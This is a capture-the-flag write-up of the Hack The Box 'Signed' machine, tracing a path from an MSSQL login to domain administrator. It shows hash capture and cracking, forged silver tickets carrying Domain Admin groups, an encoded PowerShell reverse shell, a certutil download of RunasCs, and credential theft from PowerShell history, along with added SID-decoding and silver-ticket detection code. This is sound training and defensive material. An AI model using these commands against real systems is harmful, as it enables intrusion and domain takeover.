SIGNED-HTB Notes

SIGNED-HTB

Here are my notes on the SIGNED box from Hack The Box.

SIGNED: 10.10.11.90

As is common in real life Windows penetration tests, you will start the Signed box with credentials for the following account which can be used to access the MSSQL service: scott / Sm230#C5NatH

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-31T04:03:19
|_Not valid after:  2055-10-31T04:03:19
|_ssl-date: 2025-11-02T18:08:53+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)


scott:Sm230#C5NatH

impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90 -windows-auth #NOPE

Escalating From MSSQL Silver Ticket to Domain Admin: #SIGNED-HTB 

impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90 #WORKS


┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# impacket-mssqlclient scott:Sm230#C5NatH@10.10.11.90
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (scott  guest@master)>


SQL (scott  guest@master)> enum_links;
SRV_NAME   SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE   SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
--------   ----------------   -----------   --------------   ------------------   ------------   -------
DC01       SQLNCLI            SQL Server    DC01             NULL                 NULL           NULL
Linked Server   Local Login   Is Self Mapping   Remote Login
-------------   -----------   ---------------   ------------
SQL (scott  guest@master)> enable_xp_cmdshell;
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.

SELECT name FROM sys.databases;

SQL (scott  guest@master)> SELECT name FROM sys.databases;

name
------
master
tempdb
model
msdb

#NOTHING INTERESTING.

xp_dirtree '\\10.10.14.142\a';

SQL (scott  guest@master)> xp_dirtree \\10.10.14.142\a;
subdirectory   depth   file
------------   -----   ----

Responder: 

sudo responder -I tun1

[SNIP]

[SMB] NTLMv2-SSP Client   : 10.10.11.90
[SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::SIGNED:e5f6163c4fbce3cc:[SNIP]

mssqlsvc::SIGNED:e5f6163c4fbce3cc:62BA233C1B8F44760CED6262F41E4D8A:01010000000000008073426CB150DC0199AE29FF1964291300000000020008004300300042004C0001001E00570049004E002D00380051004800510052004200330055004A003700450004003400570049004E002D00380051004800510052004200330055004A00370045002E004300300042004C002E004C004F00430041004C00030014004300300042004C002E004C004F00430041004C00050014004300300042004C002E004C004F00430041004C00070008008073426CB150DC01060004000200000008003000300000000000000000000000003000001DE8B8AAFC69B945F6E45499405E964D1A264F31CDEB21CAC01FCEB2F7B5BDAA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340032000000000000000000


┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
purPLE9795!@     (mssqlsvc)
1g 0:00:00:07 DONE (2025-11-08 13:15) 0.1400g/s 628454p/s 628454c/s 628454C/s purcitititya..puppuh
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

mssqlsvc:purPLE9795!@

impacket-mssqlclient 'mssqlsvc:purPLE9795!@'@10.10.11.90

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# impacket-mssqlclient 'mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  guest@master)>

It looks like we can turn this into a silver ticket and get sa (sysadmin) out of it?

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

#NOTHING.

SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';

SQL (SIGNED\mssqlsvc  guest@master)> SELECT r.name AS role, m.name AS member FROM sys.server_principals r JOIN sys.server_role_members rm ON r.principal_id = rm.role_principal_id JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id WHERE r.name = 'sysadmin';

role       member
--------   -------------------------
sysadmin   sa
sysadmin   SIGNED\IT
sysadmin   NT SERVICE\SQLWriter
sysadmin   NT SERVICE\Winmgmt
sysadmin   NT SERVICE\MSSQLSERVER
sysadmin   NT SERVICE\SQLSERVERAGENT


SQL (SIGNED\mssqlsvc  guest@master)> enum_users;
UserName                            RoleName   LoginName                           DefDBName   DefSchemaName   UserID   SID
---------------------------------   --------   ---------------------------------   ---------   -------------   ------   ------------------------------------------------------------------
##MS_AgentSigningCertificate##      public     ##MS_AgentSigningCertificate##      master      NULL            6        010600000000000901000000fb1b6ce60eda55e1d3dde93b99db322bfc435563
##MS_PolicyEventProcessingLogin##   public     ##MS_PolicyEventProcessingLogin##   master      dbo             5        56f12609fb4eb548906b5a62effb1840
dbo                                 db_owner   sa                                  master      dbo             1        01
guest                               public     NULL                                NULL        guest           2        00
INFORMATION_SCHEMA                  public     NULL                                NULL        NULL            3        NULL
sys                                 public     NULL                                NULL        NULL            4

SQL (SIGNED\mssqlsvc  guest@master)> select default_domain()

------
SIGNED

SELECT DEFAULT_DOMAIN();

SELECT SUSER_SID('SIGNED\Domain Admins')

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\Domain Admins')

-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000'

# Hex string returned by SUSER_SID('SIGNED\Domain Admins') above
$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000"
# Convert the hex text to raw bytes, two characters per byte
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
    $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
# Let .NET parse the binary SID and print the S-1-5-... string form
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value


PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>>     $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-512

S-1-5-21-4088429403-1159899800-2753317549-512  #SIGNED\Domain Admins (RID 512)

SELECT SUSER_SID('SIGNED\IT')

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\IT')

-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'


$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
    $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value

PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>>     $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-1105
PS C:\Users\User>

S-1-5-21-4088429403-1159899800-2753317549-1105  #SIGNED\IT

SELECT SUSER_SID('SIGNED\mssqlsvc')

SQL (SIGNED\mssqlsvc  guest@master)> SELECT SUSER_SID('SIGNED\mssqlsvc')

-----------------------------------------------------------
b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000'


$BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
    $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value

PS C:\Users\User> $BinarySID = "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>>     $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-4088429403-1159899800-2753317549-1103
PS C:\Users\User>

S-1-5-21-4088429403-1159899800-2753317549-1103 #SIGNED\mssqlsvc



S-1-5-21-4088429403-1159899800-2753317549 = DOMAIN SID
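The PowerShell snippets above do the conversion on a Windows host. The same decoding in Python, as an added example that is not part of these notes or of Impacket, makes the binary layout SUSER_SID() returns explicit (revision, sub-authority count, 48-bit big-endian identifier authority, little-endian sub-authorities) and checks the three values above offline. It also runs the other way, so a defender reviewing which RIDs a ticket's PAC claims can build and compare SIDs without a Windows box. The function names (sid_bytes_to_string, sid_string_to_bytes, decode_suser_sid, split_domain_and_rid) and the PAGE_SIDS table are mine; the hex values are the ones returned by the queries above.

```python
"""Decode and encode Windows SIDs in the binary form SQL Server's SUSER_SID() returns.

Added example for these notes (not from the box or from Impacket). Layout per MS-DTYP 2.4.2.2:
  byte 0      revision (always 1)
  byte 1      number of sub-authorities (at most 15)
  bytes 2-7   48-bit identifier authority, big-endian
  then        N sub-authorities, each a 32-bit little-endian unsigned integer
"""
import struct
from typing import Tuple

# Values copied from the SUSER_SID() lookups in the notes above.
PAGE_SIDS = {
    "SIGNED\\Domain Admins": "0105000000000005150000005b7bb0f398aa2245ad4a1ca400020000",
    "SIGNED\\IT":            "0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000",
    "SIGNED\\mssqlsvc":      "0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000",
}


def sid_bytes_to_string(raw: bytes) -> str:
    """Convert a binary SID to its S-1-... string form, validating the layout first."""
    if len(raw) < 8:
        raise ValueError("SID shorter than the 8-byte header")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > 15 or len(raw) != 8 + 4 * count:
        raise ValueError(f"sub-authority count {count} does not match length {len(raw)}")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, 8)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def sid_string_to_bytes(sid: str) -> bytes:
    """Inverse of sid_bytes_to_string: build the binary form SQL Server stores and compares."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a revision-1 SID: {sid}")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15 or authority >= 1 << 48 or any(s >= 1 << 32 for s in subs):
        raise ValueError("SID field out of range")
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def decode_suser_sid(cell: str) -> str:
    """Accept the hex exactly as mssqlclient prints it, with or without the b'...' wrapper."""
    cell = cell.strip()
    if cell.startswith("b'") and cell.endswith("'"):
        cell = cell[2:-1]
    return sid_bytes_to_string(bytes.fromhex(cell))


def split_domain_and_rid(sid: str) -> Tuple[str, int]:
    """Separate the domain identifier from the trailing RID (the two parts ticketer.py takes separately)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


if __name__ == "__main__":
    for name, hexsid in PAGE_SIDS.items():
        text = decode_suser_sid(hexsid)
        domain, rid = split_domain_and_rid(text)
        print(f"{name:<22} {text}  (domain {domain}, RID {rid})")
```

Decoding all three values gives the same domain identifier with RIDs 512, 1105 and 1103, which is the consistency check worth doing before trusting any RID you read off a query result.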

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
            -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
            -domain signed.htb \
            -spn MSSQLSvc/DC01.signed.htb:1433 \
            -groups 1105 \
            -user-id 1103 \
            mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache 

mssqlclient.py -k -no-pass dc01.signed.htb

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
            -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
            -domain signed.htb \
            -spn MSSQLSvc/DC01.signed.htb:1433 \
            -groups 1105 \
            -user-id 1103 \
            mssqlsvc
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# export KRB5CCNAME=mssqlsvc.ccache

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# mssqlclient.py -k -no-pass dc01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  dbo@master)> enable_xp_cmdshell
INFO(DC01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SIGNED\mssqlsvc  dbo@master)> xp_cmdshell "whoami"
output
---------------
signed\mssqlsvc
NULL


RCE-WORKS !


xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADIAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"


┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.142] from (UNKNOWN) [10.10.11.90] 49855
whoami
signed\mssqlsvc
PS C:\Windows\system32> hostname
DC01

USER-SHELL !

PS C:\Users\mssqlsvc\Desktop> whoami
signed\mssqlsvc
PS C:\Users\mssqlsvc\Desktop> hostname
DC01
PS C:\Users\mssqlsvc\Desktop> dir


    Directory: C:\Users\mssqlsvc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/6/2025   8:01 PM             34 user.txt


PS C:\Users\mssqlsvc\Desktop> type user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]

PRIV ESC: 

Go back and forge a silver ticket carrying the Domain Admins and Enterprise Admins RIDs (512, 519) along with the IT group (1105).


ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
            -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
            -domain signed.htb \
            -spn MSSQLSvc/DC01.signed.htb:1433 \
            -groups 512,519,1105 \
            -user-id 1103 \
            mssqlsvc

export KRB5CCNAME=mssqlsvc.ccache 

mssqlclient.py -k -no-pass dc01.signed.htb

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]                                                                                            
└─# ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
            -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
            -domain signed.htb \
            -spn MSSQLSvc/DC01.signed.htb:1433 \
            -groups 512,519,1105 \
            -user-id 1103 \
            mssqlsvc
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for signed.htb/mssqlsvc
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in mssqlsvc.ccache

┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# export KRB5CCNAME=mssqlsvc.ccache


┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# mssqlclient.py -k -no-pass dc01.signed.htb

Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2022 RTM (16.0.1000)
[!] Press help for extra shell commands
SQL (SIGNED\mssqlsvc  dbo@master)>

xp_cmdshell still runs as mssqlsvc, so the OS-level RCE is no more privileged than before. What the silver ticket's 512 and 519 groups buy us is sysadmin inside SQL Server, and with that the engine itself reads files on our behalf with its own privileges, which is how we reach the Administrator profile below.
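Detection angle, as an added example rather than anything from the box or a vendor rule: a silver ticket is built offline from the service account's key, so the KDC never records a 4769 (Kerberos service ticket requested) for it, while the service host still records a 4624 logon with the Kerberos authentication package when the ticket is presented. Correlating the two catches both tickets forged above. On SIGNED the SQL Server runs on the DC, so both events land in one Security log; on a member server you would join the DCs' 4769s against the host's 4624s. The event records below are constructed samples, and the function and field names (Event, parse_event, find_unissued_kerberos_logons, run_sample) are mine.

```python
"""Flag Kerberos service logons that no KDC-issued service ticket accounts for.

Added detection example for these notes (not part of the box). Input records use
the Security-log field names as exported by wevtutil / Get-WinEvent; the sample
records themselves are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass
class Event:
    time: datetime
    event_id: int
    account: str          # normalized: bare sAMAccountName, lower-case
    client_ip: str
    auth_package: str     # 4624 only: Kerberos / NTLM / Negotiate
    service: str          # 4769 only: service account the ticket was requested for
    status: str           # 4769 only: failure code, "0x0" on success


def normalize_account(name: str) -> str:
    """'SIGNED\\mssqlsvc', 'mssqlsvc@SIGNED.HTB' and 'mssqlsvc' all become 'mssqlsvc'."""
    name = name.rsplit("\\", 1)[-1]
    name = name.split("@", 1)[0]
    return name.lower()


def parse_event(raw: Dict[str, str]) -> Event:
    """Map one exported Security-log record to an Event; strips the ::ffff: IPv4-mapped prefix."""
    return Event(
        time=datetime.fromisoformat(raw["TimeCreated"]),
        event_id=int(raw["EventID"]),
        account=normalize_account(raw["TargetUserName"]),
        client_ip=raw.get("IpAddress", "").removeprefix("::ffff:"),
        auth_package=raw.get("AuthenticationPackageName", ""),
        service=raw.get("ServiceName", ""),
        status=raw.get("Status", "0x0"),
    )


def find_unissued_kerberos_logons(events: List[Event],
                                  window: timedelta = timedelta(hours=10)) -> List[Event]:
    """Return 4624 Kerberos logons with no successful 4769 for the same account and
    client address within `window` before them (10 h is the default service ticket lifetime)."""
    issued = [e for e in events if e.event_id == 4769 and e.status == "0x0"]
    flagged: List[Event] = []
    for logon in sorted(events, key=lambda e: e.time):
        if logon.event_id != 4624 or logon.auth_package.lower() != "kerberos":
            continue
        backed = any(
            t.account == logon.account
            and t.client_ip == logon.client_ip
            and timedelta(0) <= logon.time - t.time <= window
            for t in issued
        )
        if not backed:
            flagged.append(logon)
    return flagged


# Constructed sample: one legitimate logon backed by a TGS request, one silver-ticket
# logon with no TGS request at all, one NTLM logon (out of scope for this check), and
# one logon whose only TGS request failed with 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN).
SAMPLE_EVENTS = [
    {"EventID": "4769", "TimeCreated": "2025-11-08T11:59:58", "TargetUserName": "mssqlsvc@SIGNED.HTB",
     "ServiceName": "mssqlsvc", "IpAddress": "::ffff:192.168.56.20", "Status": "0x0"},
    {"EventID": "4624", "TimeCreated": "2025-11-08T12:00:00", "TargetUserName": "SIGNED\\mssqlsvc",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.56.20"},
    {"EventID": "4624", "TimeCreated": "2025-11-08T12:31:07", "TargetUserName": "SIGNED\\mssqlsvc",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.142"},
    {"EventID": "4624", "TimeCreated": "2025-11-08T12:45:00", "TargetUserName": "SIGNED\\mssqlsvc",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.14.142"},
    {"EventID": "4769", "TimeCreated": "2025-11-08T13:00:00", "TargetUserName": "svc_backup@SIGNED.HTB",
     "ServiceName": "mssqlsvc", "IpAddress": "::ffff:10.10.14.142", "Status": "0x6"},
    {"EventID": "4624", "TimeCreated": "2025-11-08T13:00:02", "TargetUserName": "SIGNED\\svc_backup",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.10.14.142"},
]


def run_sample() -> List[Event]:
    return find_unissued_kerberos_logons([parse_event(r) for r in SAMPLE_EVENTS])


if __name__ == "__main__":
    for hit in run_sample():
        print(f"{hit.time:%H:%M:%S} {hit.account:<12} from {hit.client_ip}: "
              f"Kerberos logon with no issued service ticket")
```

Two hits come out of the sample: the mssqlsvc logon from 10.10.14.142 with no TGS request behind it, and the svc_backup logon whose only TGS request failed. The window defaults to the 10-hour service ticket lifetime because a legitimately issued ticket can be presented long after its 4769, so the check is strongest on the first logon after a ticket appears; it says nothing about the group list inside a ticket, which on this box is exactly what was forged.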

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS x;

SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt',SINGLE_CLOB) AS x;


[SNIP]

er-ScheduledTask -TaskName "Clean_DNS_Task" -Action $Action -Trigger $Trigger -Settings $Settings -User "SIGNED\\Administrator" -Password "Welcome1"\r\ncd ..\\Documents\\\r\nnotepad restart.ps1\r\nexplorer .\r\ndir ..\\Desktop\\\r\nmove ..\\Desktop\\cleanup.ps1 .\r\ndir ..\\Desktop\\\r\ndir\r\nGet-NetConnectionProfile\r\nSet-ADAccountPassword -Identity "Administrator" -NewPassword (ConvertTo-SecureString "Th1s889Rabb!t" -AsPlainText -Force) -Reset\r\nSet-Service TermService -StartupType disabled\r\nexit\r\nGet-NetConnectionProfile\r\nnltest /dsgetdc:signed.htb\r\nwusa /uninstall /kb:5065428\r\niwr http://10.10.11.90:81/vmt.exe -O vmt.exe\r\niwr http://10.10.14.62:81/vmt.exe -O vmt.exe\r\n.\\vmt.exe\r\ndel .\\vmt.exe\r\nmanage-bde -off c:\\\r\ndisable-bitlocker -mountpoint c:\\\r\npowershell iwr https://catalog.s.download.windowsupdate.com/c/msdownload/update/software/secu/2024/06/windows10.0-kb5039217-x64_bc72f4ed75c

Administrator:Th1s889Rabb!t 

We found an Administrator credential. 

xp_cmdshell "certutil.exe -urlcache -split -f http://10.10.14.142/RunasCs.exe C:\Users\Public\RunasCs.exe"

xp_cmdshell "C:\Users\Public\RunasCs.exe Administrator Th1s889Rabb!t  powershell.exe -r 10.10.14.142:4444" 



impacket-mssqlclient Administrator:'Th1s889Rabb!t'@10.10.11.90 -windows-auth  #NOPE, only guest: the Administrator account was never given a sysadmin login.


┌──(root㉿kali)-[/home/…/BOXES/SIGNED/10.10.11.90/nmap]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.142] from (UNKNOWN) [10.10.11.90] 51440
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
signed\administrator
PS C:\Windows\system32> hostname
hostname
DC01

ADMINISTRATOR SHELL ! 

PS C:\Users\Administrator\Desktop> whoami
whoami
signed\administrator
PS C:\Users\Administrator\Desktop> hostname
hostname
DC01
PS C:\Users\Administrator\Desktop> dir
dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        11/6/2025   8:01 PM             34 root.txt


PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
[REDIRECTED]

ROOT.TXT: [REDIRECTED]





DIDN'T WORK:

script.sh: 

#!/bin/bash
# Enumerate domain principals by RID through MSSQL: SID_BINARY() builds the binary
# SID for DOMAIN-SID-<RID> and SUSER_SNAME() asks the server to resolve it to an
# account name (the SUSER_SID lookups above, run in reverse).

USERNAME="mssqlsvc"
PASSWORD="purPLE9795!@"
SERVER="signed.htb"
SID_BASE="S-1-5-21-4088429403-1159899800-2753317549"

# Put every lookup into one script so a single connection does the whole sweep
